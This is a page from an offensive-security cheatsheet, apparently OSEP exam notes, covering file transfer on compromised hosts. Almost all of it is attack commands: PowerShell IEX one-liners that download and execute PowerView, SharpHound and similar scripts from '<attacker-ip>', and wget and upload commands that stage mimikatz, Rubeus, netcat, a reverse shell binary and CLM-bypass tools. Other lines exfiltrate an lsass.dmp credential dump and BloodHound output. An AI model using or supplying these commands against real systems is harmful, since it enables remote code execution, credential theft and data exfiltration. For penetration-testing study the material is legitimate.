Awesome Hackpuntes
LinkedInGitHubTwitterExploit-DB
Search
⌃K
Links

File transfer

Imports

IEX

IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/Powermad.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/PowerUpSQL.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/PowerView.ps1')
IEX (New-Object Net.WebClient).DownloadString('http://<attacker-ip>/SharpHound.ps1')
powershell (new-object system.net.webclient).downloadstring('http://<attacker-ip>/HostRecon.ps1') | IEX

Import-Module

cd c:\windows\tasks
. .\PowerView.ps1

wget

wget http://<attacker-ip>/CLMBypass.exe -OutFile C:\Windows\Tasks\CLMBypass.exe
wget http://<attacker-ip>/mimikatz.exe -OutFile C:\Windows\Tasks\mimikatz.exe
wget http://<attacker-ip>/mimidrv.sys -OutFile C:\Windows\Tasks\mimidrv.sys
wget http://<attacker-ip>/linpeas.sh -O /tmp/linpeas.sh
wget http://<attacker-ip>/Powermad.ps1 -OutFile C:\Windows\Tasks\Powermad.ps1
wget http://<attacker-ip>/PowerView.ps1 -OutFile C:\Windows\Tasks\PowerView.ps1
wget http://<attacker-ip>/PsExec.exe -OutFile C:\Windows\Tasks\PsExec.exe
wget http://<attacker-ip>/Rubeus.exe -OutFile C:\Windows\Tasks\Rubeus.exe
wget http://<attacker-ip>/Seatbelt.exe -OutFile C:\Windows\Tasks\Seatbelt.exe
wget http://<attacker-ip>/SharpHound.exe -OutFile C:\Windows\Tasks\SharpHound.exe
wget http://<attacker-ip>/shell.exe -OutFile C:\Windows\Tasks\shell.exe
wget http://<attacker-ip>/SpoolSample.exe -OutFile C:\Windows\Tasks\SpoolSample.exe
wget http://<attacker-ip>/netcat.bat -OutFile C:\Windows\Tasks\netcat.bat
wget http://<attacker-ip>/nc.exe -OutFile C:\Windows\Tasks\nc.exe

Uploads

upload /var/www/html/bypass-clm.exe c:\\windows\\tasks
upload /var/www/html/CLMBypass.exe c:\\windows\\tasks
upload /var/www/html/CustomRunspace.exe c:\\windows\\tasks
upload /var/www/html/HostRecon.ps1 c:\\windows\\tasks
upload /var/www/html/LAPSToolkit.ps1 c:\\windows\\tasks
upload /var/www/html/mimikatz.exe c:\\windows\\tasks
upload /var/www/html/PowerView.ps1 c:\\windows\\tasks
upload /var/www/html/PrintSpooferNetNI.exe c:\\windows\\tasks
upload /var/www/html/PrivescCheck.ps1 c:\\windows\\tasks
upload /var/www/html/Rubeus.exe c:\\windows\\tasks
upload /var/www/html/SharpHound.exe c:\\windows\\tasks
upload /var/www/html/SharpHound.ps1 c:\\windows\\tasks
upload /var/www/html/SpoolSample.exe c:\\windows\\tasks
upload /var/www/html/XORCrypter.exe c:\\windows\\tasks
upload /var/www/html/XORCrypter.exe c:\\inetpub\\wwwroot

Downloads

download c:\\windows\\tasks\\bloodhound.zip
download C:\\windows\\tasks\\HostRecon.txt
download C:\\windows\\tasks\\lsass.dmp /var/www/html/lsass.dmp
download c:\\windows\\tasks\\PrivescCheck.html
download c:\\windows\\tasks\\test.txt
OSEP Cheatsheet - Previous
AV Evasion
Next - OSEP Cheatsheet
Exfiltrate Data
Last modified 12d ago